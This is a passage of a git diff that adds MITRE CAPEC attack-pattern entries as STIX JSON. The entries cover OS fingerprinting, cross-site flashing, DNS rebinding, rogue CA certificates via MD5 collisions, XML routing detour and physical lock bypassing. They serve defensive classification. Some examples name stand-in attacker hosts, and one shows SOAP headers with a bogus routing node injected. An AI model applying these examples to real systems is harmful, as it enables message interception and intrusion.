Sequence Number Probe", + "description": "This OS fingerprinting probe tests the target system's assignment of TCP sequence numbers. One common way to test TCP Sequence Number generation is to send a probe packet to an open port on the target and then compare the how the Sequence Number generated by the target relates to the Acknowledgement Number in the probe packet. Different operating systems assign Sequence Numbers differently, so a fingerprint of the operating system can be obtained by categorizing the relationship between the acknowledgement number and sequence number as follows: 1) the Sequence Number generated by the target is Zero, 2) the Sequence Number generated by the target is the same as the acknowledgement number in the probe, 3) the Sequence Number generated by the target is the acknowledgement number plus one, or 4) the Sequence Number is any other non-zero number.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/321.html", + "external_id": "CAPEC-321" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--642de78e-0ded-49d0-bd92-b8b1f826f645.json b/capec/attack-pattern/attack-pattern--642de78e-0ded-49d0-bd92-b8b1f826f645.json new file mode 100644 index 0000000000..2915a7ca0a --- /dev/null +++ b/capec/attack-pattern/attack-pattern--642de78e-0ded-49d0-bd92-b8b1f826f645.json @@ -0,0 +1,83 @@ +{ + "type": "bundle", + "id": "bundle--46a78a99-b9a8-48ed-b0b0-8b8f8c49ab6c", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--642de78e-0ded-49d0-bd92-b8b1f826f645", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Cross-Site Flashing", + "description": "An attacker is able to trick the victim into executing a Flash document that passes commands or calls to a Flash player browser plugin, allowing the attacker to exploit native Flash functionality in the client browser. This attack pattern occurs where an attacker can provide a crafted link to a Flash document (SWF file) which, when followed, will cause additional malicious instructions to be executed. The attacker does not need to serve or control the Flash document. The attack takes advantage of the fact that Flash files can reference external URLs. If variables that serve as URLs that the Flash application references can be controlled through parameters, then by creating a link that includes values for those parameters, an attacker can cause arbitrary content to be referenced and possibly executed by the targeted Flash application.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/178.html", + "external_id": "CAPEC-178" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stefano Di Paola, Testing Flash Applications, 2007", + "url": "http://www.wisec.it/en/Docs/flash_App_testing_Owasp07.pdf", + "external_id": "REF-41" + }, + { + "source_name": "reference_from_CAPEC", + "description": "OWASP Testing Guide (v4 [DRAFT]), The Open Web Application Security Project (OWASP)", + "url": "http://www.owasp.org/index.php/Testing_for_Cross_site_flashing_(OWASP-DV-004)", + "external_id": "REF-42" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Cross-Site Flashing, Trustwave", + "url": "http://doc.cenzic.com/sadoc9x14ba847/CPL0001509.htm", + "external_id": "REF-561" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "The attacker tries to get his malicious flash movie to be executed in the targeted flash application. The malicious file is hosted on the attacker.com domain and the targeted flash application is hosted on example.com The crossdomain.xml file in the root of example.com allows all domains and no specific restriction is specified in the targeted flash application. When the attacker injects his malicious file in the vulnerable flash movie, the rogue flash application is able to access internal variables and parameter of the flash movie." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The targeted Flash application must reference external URLs and the locations thus referenced must be controllable through parameters. The Flash application must fail to sanitize such parameters against malicious manipulation. The victim must follow a crafted link created by the attacker." + ], + "x_capec_skills_required": { + "Medium": "knowledge of Flash internals, parameters and remote referencing." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--6444e23c-7f2c-43d3-be1c-862e12611f33.json b/capec/attack-pattern/attack-pattern--6444e23c-7f2c-43d3-be1c-862e12611f33.json new file mode 100644 index 0000000000..fec2c74914 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--6444e23c-7f2c-43d3-be1c-862e12611f33.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--7b9f1525-f8bb-472e-85fa-c73656b92082", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--6444e23c-7f2c-43d3-be1c-862e12611f33", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Target Influence via Eye Cues", + "description": "The adversary gains information via non-verbal means from the target through eye movements.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/429.html", + "external_id": "CAPEC-429" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "url": "http://www.social-engineer.org", + "external_id": "REF-348" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--6466bbec-2e27-46ba-b910-8046649e65c8.json b/capec/attack-pattern/attack-pattern--6466bbec-2e27-46ba-b910-8046649e65c8.json new file mode 100644 index 0000000000..c22e9b57b3 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--6466bbec-2e27-46ba-b910-8046649e65c8.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--a5b1c03c-4036-4102-9860-6283f2401a1f", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--6466bbec-2e27-46ba-b910-8046649e65c8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Remote Services with Stolen Credentials", + "description": "This pattern of attack involves an adversary that uses stolen credentials to leverage remote services such as RDP, telnet, SSH, and VNC to log into a system. Once access is gained, any number of malicious activities could be performed.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/555.html", + "external_id": "CAPEC-555" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html", + "external_id": "CWE-522" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). There are other implementations and third-party tools that provide graphical access Remote Services similar to RDS. Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.", + "Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). It may be called with the winrm command or by any number of programs such as PowerShell." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--64806018-082c-4998-9b06-4bc812b23ac6.json b/capec/attack-pattern/attack-pattern--64806018-082c-4998-9b06-4bc812b23ac6.json new file mode 100644 index 0000000000..6249a2b317 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--64806018-082c-4998-9b06-4bc812b23ac6.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--85b7c849-6e21-49dc-b5a4-e87196f4c9f1", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--64806018-082c-4998-9b06-4bc812b23ac6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Bypassing Electronic Locks and Access Controls", + "description": "An attacker exploits security assumptions to bypass electronic locks or other forms of access controls. Most attacks against electronic access controls follow similar methods but utilize different tools. Some electronic locks utilize magnetic strip cards, others employ RFID tags embedded within a card or badge, or may involve more sophisticated protections such as voice-print, thumb-print, or retinal biometrics. Magnetic Strip and RFID technologies are the most widespread because they are cost effective to deploy and more easily integrated with other electronic security measures. These technologies share common weaknesses that an attacker can exploit to gain access to a facility protected by the mechanisms via copying legitimate cards or badges, or generating new cards using reverse-engineered algorithms.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/395.html", + "external_id": "CAPEC-395" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--65a9acf3-76b1-4379-a78b-7df3a80e096d.json b/capec/attack-pattern/attack-pattern--65a9acf3-76b1-4379-a78b-7df3a80e096d.json new file mode 100644 index 0000000000..936254e620 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--65a9acf3-76b1-4379-a78b-7df3a80e096d.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--7605d7e8-5a55-429b-a13c-53afa0f35acc", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--65a9acf3-76b1-4379-a78b-7df3a80e096d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Creating a Rogue Certification Authority Certificate", + "description": "An adversary exploits a weakness in the MD5 hash algorithm (weak collision resistance) to generate a certificate signing request (CSR) that contains collision blocks in the \"to be signed\" part. The adversary specially crafts two different, but valid X.509 certificates that when hashed with the MD5 algorithm would yield the same value. The adversary then sends the CSR for one of the certificates to the Certification Authority which uses the MD5 hashing algorithm. That request is completely valid and the Certificate Authority issues an X.509 certificate to the adversary which is signed with its private key. An adversary then takes that signed blob and inserts it into another X.509 certificate that the attacker generated. Due to the MD5 collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. The net effect is that the adversary's second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority. To make the attack more interesting, the second certificate could be not just a regular certificate, but rather itself a signing certificate. Thus the adversary is able to start their own Certification Authority that is anchored in its root of trust in the legitimate Certification Authority that has signed the attackers' first X.509 certificate. If the original Certificate Authority was accepted by default by browsers, so will now the Certificate Authority set up by the adversary and of course any certificates that it signs. So the adversary is now able to generate any SSL certificates to impersonate any web server, and the user's browser will not issue any warning to the victim. This can be used to compromise HTTPS communications and other types of systems where PKI and X.509 certificates may be used (e.g., VPN, IPSec).", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/459.html", + "external_id": "CAPEC-459" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html", + "external_id": "CWE-327" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/295.html", + "external_id": "CWE-295" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html", + "external_id": "CWE-290" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger, MD5 Considered Harmful Today: Creating a Rogue CA Certificate, 2008--12---30, Phreedom.org", + "url": "http://www.phreedom.org/research/rogue-ca/", + "external_id": "REF-395" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "Certification Authority is using the MD5 hash function to generate the certificate hash to be signed" + ], + "x_capec_skills_required": { + "High": "An attacker must be able to craft two X.509 certificates that produce the same MD5 hash", + "Medium": "Knowledge needed to set up a certification authority" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--65ca02d7-25ef-4ed4-accb-5d7c149868f4.json b/capec/attack-pattern/attack-pattern--65ca02d7-25ef-4ed4-accb-5d7c149868f4.json new file mode 100644 index 0000000000..17ca760be2 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--65ca02d7-25ef-4ed4-accb-5d7c149868f4.json @@ -0,0 +1,84 @@ +{ + "type": "bundle", + "id": "bundle--de38449e-3cdd-4e47-b026-b4cbe135cede", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--65ca02d7-25ef-4ed4-accb-5d7c149868f4", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "DNS Rebinding", + "description": "An adversary serves content whose IP address is resolved by a DNS server that the adversary controls. After initial contact by a web browser (or similar client), the adversary changes the IP address, to which its name resolves, to an address within the target organization that is not publicly accessible. This allows the web browser to examine this internal address on behalf of the adversary. Web browsers enforce security zones based on DNS names in order to prevent cross-zone disclosure of information. In a DNS binding attack, an adversary publishes content on their own server with their own name and DNS server. The first time the target accesses the adversary's content, the adversary's name must be resolved to an IP address. The adversary's DNS server performs this resolution and provides a short Time-To-Live (TTL) in order to prevent the target from caching the value. When the target makes a subsequent request to the adversary's content, the adversary's DNS server must again be queried, but this time the DNS server returns an address internal to the target's organization that would not be accessible from an outside source. Because the same name resolves to both these IP addresses, browsers will place both IP addresses in the same security zone and allow information to flow between the addresses. The adversary can then use scripts in the content the target retrieved from the adversary in the original message to exfiltrate data from the named internal addresses. This allows adversaries to discover sensitive information about the internal network of an enterprise. If there is a trust relationship between the computer with the targeted browser and the internal machine the adversary identifies, additional attacks are possible. This attack differs from pharming attacks in that the adversary is the legitimate owner of the malicious DNS server and so does not need to compromise behavior of external DNS services.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/275.html", + "external_id": "CAPEC-275" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/350.html", + "external_id": "CWE-350" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Collin Jackson, Adam Barth, Andrew Bortz, Weidong Shao, Dan Boneh, Protecting Browsers from DNS Rebinding Attacks, In Proceedings of ACM CCS 07", + "external_id": "REF-119" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "url": "http://en.wikipedia.org/wiki/DNS_rebinding", + "external_id": "REF-120" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "The adversary registers a domain name, such as www.evil.com with IP address 1.3.5.7, delegates it to his own DNS server (1.3.5.2), and uses phishing links or emails to get HTTP traffic. Instead of sending a normal TTL record, the DNS server sends a very short TTL record (for example, 1 second), preventing DNS response of entry[www.evil.com, 1.3.5.7] from being cached on victim's (192.168.1.10) browser. The adversary's server first responds to the victim with malicious script such as JavaScript, containing IP address (1.3.5.7) of the server. The adversary uses XMLHttpRequest (XHR) to send HTTP request or HTTPS request directly to the adversary's server and load response. The malicious script allows the adversary to rebind the host name to the IP address (192.168.1.2) of a target server that is behind the firewall. Then the server responds to the adversary's real target, which is an internal host IP (192.168.1.2) in the same domain of the victim (192.168.1.10). Because the same name resolves to both these IP addresses, browsers will place both IP addresses (1.3.5.7 and 192.168.1.2) in the same security zone and allow information to flow between the addresses. Further, the adversary can achieve scanning and accessing all internal hosts in the victim's local network (192.168.X.X) by sending multiple short-lived IP addresses." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target browser must access content server from the adversary controlled DNS name. Web advertisements are often used for this purpose. The target browser must honor the TTL value returned by the adversary and re-resolve the adversary's DNS name after initial contact." + ], + "x_capec_resources_required": [ + "The adversary must serve some web content that a victim accesses initially. This content must include executable content that queries the adversary's DNS name (to provide the second DNS resolution) and then performs the follow-on attack against the internal system. The adversary also requires a customized DNS server that serves an IP address for their registered DNS name, but which resolves subsequent requests by a single client to addresses internal to that client's network." + ], + "x_capec_skills_required": { + "Medium": "Setup DNS server and the adversary's web server. Write a malicious script to allow the victim to connect to the web server." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--6627f4c5-d918-40b5-bb4a-8ade04d5e926.json b/capec/attack-pattern/attack-pattern--6627f4c5-d918-40b5-bb4a-8ade04d5e926.json new file mode 100644 index 0000000000..64f5cadb19 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--6627f4c5-d918-40b5-bb4a-8ade04d5e926.json @@ -0,0 +1,95 @@ +{ + "type": "bundle", + "id": "bundle--200f757c-ec75-4840-949d-52cacd2ca76c", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--6627f4c5-d918-40b5-bb4a-8ade04d5e926", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "XML Routing Detour Attacks", + "description": "An attacker subverts an intermediate system used to process XML content and forces the intermediate to modify and/or re-route the processing of the content. XML Routing Detour Attacks are Man in the Middle type attacks. The attacker compromises or inserts an intermediate system in the processing of the XML message. For example, WS-Routing can be used to specify a series of nodes or intermediaries through which content is passed. If any of the intermediate nodes in this route are compromised by an attacker they could be used for a routing detour attack. From the compromised system the attacker is able to route the XML process to other nodes of his or her choice and modify the responses so that the normal chain of processing is unaware of the interception. This system can forward the message to an outside entity and hide the forwarding and processing from the legitimate processing systems by altering the header information.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/219.html", + "external_id": "CAPEC-219" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/441.html", + "external_id": "CWE-441" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/610.html", + "external_id": "CWE-610" + }, + { + "source_name": "reference_from_CAPEC", + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "url": "http://projects.webappsec.org/w/page/13246956/Routing-Detour", + "external_id": "REF-80" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Andre Yee, Threat Protection in a Service Oriented World, NFR Security", + "url": "http://www.unatekconference.com/images/pdfs/presentations/Yee.pdf", + "external_id": "REF-81" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Pete Lindstrom, Attacking & Defending Web Services, 2002, SPiRE Security", + "url": "http://www.webtorials.com/main/comnet/cn2003/web-service/24.pdf", + "external_id": "REF-65" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "\n Here is an example SOAP call from a client, example1.com, to a target, example4.com, via 2 intermediaries, example2.com and example3.com. (note: The client here is not necessarily a 'end user client' but rather the starting point of the XML transaction).\n \n Example SOAP message with routing information in header:\n <S:Envelope> <S:Header> <m:path xmlns:m=\"http://schemas.example.com/rp/\" S:actor=\"http://schemas.example.com/soap/actor\" S:mustUnderstand=\"1\"> <m:action>http://example1.com/</m:action> <m:to>http://example4.com/router</m:to> <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id> <m:fwd> <m:via>http://example2.com/router</m:via> </m:fwd> <m:rev /> </m:path> </S:Header> <S:Body> ... </S:Body> </S:Envelope>\n Add an additional node (example3.com/router) to the XML path in a WS-Referral message\n <r:ref xmlns:r=\"http://schemas.example.com/referral\"> <r:for> <r:prefix>http://example2.com/router</r:prefix> </r:for> <r:if/> <r:go> <r:via>http://example3.com/router</r:via> </r:go> </r:ref>\n \n \n Resulting in the following SOAP Header:<S:Envelope> <S:Header> <m:path xmlns:m=\"http://schemas.example.com/rp/\" S:actor=\"http://schemas.example.com/soap/actor\" S:mustUnderstand=\"1\"> <m:action>http://example1.com/</m:action> <m:to>http://example4.com/router</m:to> <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id> <m:fwd> <m:via>http://example2.com/router</m:via> <m:via>http://example3.com/router</m:via> </m:fwd> <m:rev /> </m:path> </S:Header> <S:Body>...</S:Body> </S:Envelope>\n In the following example, the attacker injects a bogus routing node (using a WS-Referral service) into the routing table of the XML header but not access the message directly on the initiator/intermediary node that he/she has targeted.\n \n Example of WS-Referral based WS-Routing injection of the bogus node route:<r:ref xmlns:r=\"http://schemas.example.com/referral\"> <r:for> <r:prefix>http://example2.com/router</r:prefix> </r:for> <r:if/> <r:go> <r:via>http://evilsite1.com/router</r:via> </r:go> </r:ref>\n \n Resulting XML Routing Detour attack:<S:Envelope> <S:Header> <m:path xmlns:m=\"http://schemas.example.com/rp/\" S:actor=\"http://schemas.example.com/soap/actor\" S:mustUnderstand=\"1\"> <m:action>http://example_0.com/</m:action> <m:to>http://example_4.com/router</m:to> <m:id>uuid:1235678-abcd-1a2b-3c4d-1a2b3c4d5e6f</m:id> <m:fwd> <m:via>http://example2.com/router</m:via> <m:via>http://evilesite1.com/router</m:via> <m:via>http://example3.com/router</m:via> </m:fwd> <m:rev /> </m:path> </S:Header> <S:Body> ... </S:Body> </S:Envelope>\n Thus, the attacker can route the XML message to the attacker controlled node (and access to the message contents).\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The targeted system must have multiple stages processing of XML content." + ], + "x_capec_resources_required": [ + "The attacker must be able to insert or compromise a system into the processing path for the transaction." + ], + "x_capec_skills_required": { + "Low": "To inject a bogus node in the XML routing table" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--66352194-a1a9-4654-bb38-ae96b0bb824a.json b/capec/attack-pattern/attack-pattern--66352194-a1a9-4654-bb38-ae96b0bb824a.json new file mode 100644 index 0000000000..ff735de8b3 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--66352194-a1a9-4654-bb38-ae96b0bb824a.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--39aa32ab-ae8e-4926-a40c-e05eedcd3aa5", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--66352194-a1a9-4654-bb38-ae96b0bb824a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Local Execution of Code", + "description": "An adversary installs and executes malicious code on the target system in an effort to achieve a negative technical impact. Examples include rootkits, ransomware, spyware, adware, and others.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/549.html", + "external_id": "CAPEC-549" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html", + "external_id": "CWE-829" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Other (Depending on the type of code executed by the adversary, the consequences of this attack pattern can vary widely.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Other (Depending on the type of code executed by the adversary, the consequences of this attack pattern can vary widely.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Other (Depending on the type of code executed by the adversary, the consequences of this attack pattern can vary widely.)" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Knowledge of the target system's vulnerabilities that can be capitalized on with malicious code.The adversary must be able to place the malicious code on the target system." + ], + "x_capec_resources_required": [ + "The means by which the adversary intends to place the malicious code on the system dictates the tools required. For example, suppose the adversary wishes to leverage social engineering and convince a legitimate user to open a malicious file attached to a seemingly legitimate email. In this case, the adversary might require a tool capable of wrapping malicious code into an innocuous filetype (e.g., PDF, .doc, etc.)" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--6659262a-96e0-4a82-a684-7bd17365ad06.json b/capec/attack-pattern/attack-pattern--6659262a-96e0-4a82-a684-7bd17365ad06.json new file mode 100644 index 0000000000..19a1f80ca6 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--6659262a-96e0-4a82-a684-7bd17365ad06.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--b1bab1da-6c55-4ada-b94e-d70958b412a9", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--6659262a-96e0-4a82-a684-7bd17365ad06", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Bypassing Physical Locks", + "description": "An attacker uses techniques and methods to bypass physical security measures of a building or facility. Physical locks may range from traditional lock and key mechanisms, cable locks used to secure laptops or servers, locks on server cases, or other such devices. Techniques such as lock bumping, lock forcing via snap guns, or lock picking can be employed to bypass those locks and gain access to the facilities or devices they protect, although stealth, evidence of tampering, and the integrity of the lock following an attack, are considerations that may determine the method employed. Physical locks are limited by the complexity of the locking mechanism. While some locks may offer protections such as shock resistant foam to prevent bumping or lock forcing methods, many commonly employed locks offer no such countermeasures.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/391.html", + "external_id": "CAPEC-391" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--66a47ab4-8af8-4181-a318-6b7a6c979201.json b/capec/attack-pattern/attack-pattern--66a47ab4-8af8-4181-a318-6b7a6c979201.json new file mode 100644 index 0000000000..39ee3135fa --- /dev/null +++ b/capec/attack-pattern/attack-pattern--66a47ab4-8af8-4181-a318-6b7a6c979201.json @@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": 